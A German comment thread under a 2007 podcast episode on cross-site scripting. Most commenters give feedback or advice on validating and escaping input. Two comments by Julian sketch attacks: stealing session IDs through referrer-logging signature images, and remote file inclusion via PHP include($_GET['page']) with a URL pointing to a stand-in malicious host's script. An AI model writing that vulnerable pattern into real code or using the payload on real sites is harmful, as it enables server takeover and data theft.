Kommentare zu: Technikwürze 84 – Böses Cross-Site Scripting

Von: Julian

Julian — Mon, 13 Aug 2007 12:26:22 +0000

Leider hap ich ein paar Fehler gemacht.
> about und im PHP dann
sollte eigentlich
“meine.seite.de/index.php?page=... und im PHP dann”
heißen,
> Jetzt rufen wir die Seite mal so auf:
> meine.seite.de/index.php?page=
sollte eigentlich
“Jetzt rufen wir die Seite mal so auf:
meine.seite.de/index.php?page=http://www.boese.seite.de/script.php”
heißen.

Julian

Von: Julian

Julian — Mon, 13 Aug 2007 12:23:00 +0000

Also entweder ich hab was überhört, oder ihr habt 2 Sachen vergessen:
* Irgendwelche Grafiken in Signaturen in Foren oder so ähnlich. Damit lassen sich die Session IDs ganz gut abfangen: Die den Refferer speichern, oft enthält diese einen GET Paramaeter mit der Session ID: mein.forum.de/index.php?sid=12...
* include() in PHP.
about und im PHP dann include($_GET[‘page’].’.php’);
Jetzt rufen wir die Seite mal so auf: meine.seite.de/index.php?page=
Was passiert dann? Genau, boese.seite.de/script.php wird includet und der Code ausgeführt. Und jetzt kommt nicht, dass der Code auf dem anderen Server ausgeführt wird. Dieser hat villeicht garkeinen PHP Parser oder es wurde z.B. per .htaccess deaktiviert. Schon kann man auch auf die Datenbank zugreifen u.s.w.

Julian

Von: Jim

Jim — Fri, 10 Aug 2007 10:27:28 +0000

Wie immer interessant – jedoch weiss ich eigentlich immer noch nicht, was Cross Side Scripting eigentlich ist.

Es wurde eher auf Programmier-Aspekte/Vorbeugung eingegangen, als zuvor eine die Thematik allgemein zu erklären.

Bin diesmal leider nicht wirklich schlauer geworden – aber dennoch herzlichen Dank und weiter so!!!

Jim

Von: Cross Site Scripting (XSS) | bueltge.de [by:ltge.de]

Cross Site Scripting (XSS) | bueltge.de [by:ltge.de] — Thu, 09 Aug 2007 11:49:36 +0000

[…] Technikwürze 84 – Böses Cross-Site Scripting (Podcast) […]

Von: Julian Schrader

Julian Schrader — Wed, 08 Aug 2007 17:49:32 +0000

Gegen Probleme mit der Validierung von Benutzereingaben bzw. mit Injections bietet Ruby on Rails gute Mittel â€”Â die eingebauten Validierungsoptionen sind beispielhaft…

Von: Clemens

Clemens — Tue, 07 Aug 2007 15:54:06 +0000

Danke für diese Folge – sie hat mir das Thema XSS nähergebracht und hat dafür gesorgt, dass ich ab jetzt ein bisschen mehr auf die ein oder andere XSS-Lücke achten werde. Die einfachsten Sicherheitsmaßregeln kannte ich (wie wahrscheinlich viele hier) zwar schon, aber die ein oder andere Lücke war dabei, dir mir neu war.

Von: Kevin

Kevin — Tue, 07 Aug 2007 09:00:07 +0000

Ich fand es ganz gut erklärt. Ich verstehe als Programmierlaie das ein oder andere mehr. Hätte mir zwar mehr Hinweise zur Vorbeugung erwartet, aber nachdem ich jetzt mal selber etwas weitergelesen habe (und leider feststelle, dass meine PHP Entwicklungen furchtbar anfällig sind) muss ich sagen, dass das für einen Podcast echt schwer gewesen wäre.

Danke auf jeden Fall für die Hilfe zur Selbsthilfe!

Von: Manuela

Manuela — Mon, 06 Aug 2007 22:08:53 +0000

Das Thema wäre gut, würden die beiden Redner es auch den Laien, die davon betroffen sein werden, es verständlich erklären. Leider finde ich die Erklärungen ziemlich umständlich und für einfache Benutzer nicht nicht nachvollziehbar.

Von: Markus Wulftange

Markus Wulftange — Mon, 06 Aug 2007 08:49:04 +0000

Ich finde es gut, dass ihr auch Sicherheitsthemen ansprecht, die meiner Meinung nach leider nur sehr selten behandelt werden.

Cross-Site Scripting bezieht sich allerdings eigentlich nur auf Angriffe, die durch Injizierung von Schadcode beim Client ausgeführt werden, also typischerweise JavaScript-Schnipsel. Die anderen genannten Sicherheitsgefahren (SQL-Injektionen, Session Hijacking) wären also eher Themen für sich.

Allgemein sollten jedoch jegliche offensichtliche und versteckte Benutzereingaben durch eine Kombination aus Validierung (Erkennen von Fehleingaben), Filternung (Entfernen der Fehleingaben) und Maskierung (Entschärfen der Metazeichen) verarbeitet werden. Denn die meisten Sicherheitsgefahren (so etw. Cross-Site Scripting, SQL-Injektionen) werden durch fehlende oder ungenügende Maskierung der Metazeichen ermöglicht.